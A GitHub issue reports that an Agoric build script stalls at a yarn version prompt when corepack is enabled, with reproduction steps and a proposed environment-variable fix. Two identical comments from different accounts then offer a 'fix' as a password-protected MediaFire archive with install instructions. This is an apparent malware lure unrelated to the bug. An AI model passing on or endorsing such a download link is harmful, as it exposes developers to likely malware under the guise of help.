### ISSUE TITLE
`bin/agd` doesn't work with `corepack enable`

### ISSUE THREAD

**Issue by mhofman** [Agoric/Agoric#10009]
## Describe the bug
When corepack is enabled in the environment, `./bin/agd build` stalls at `yarn --version` if the cache doesn't have the yarn versions installed.

## To Reproduce

1. `corepack enable`
2. `corepack cache clean`
3. `git clean -xfd && git submodule foreach --recursive git clean -xfd`
4. `./bin/agd build`

## Expected behavior
Successful build

## Platform Environment
 - Linux, Node 20.16, corepack enable
 - master branch (17c73b7b23d3d58778baab75343ea0e6d99e4d84)

## Additional context
`yarn --version` is prompting to download yarn if the version is not available locally, but the build script detached the stdout. As of the commit above, the version of yarn in `golang/cosmos` is specified as different from the version of yarn for the rest of the sdk.

We may need to set `COREPACK_ENABLE_DOWNLOAD_PROMPT` in the build script, or find a way to fail if the yarn version is not available.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
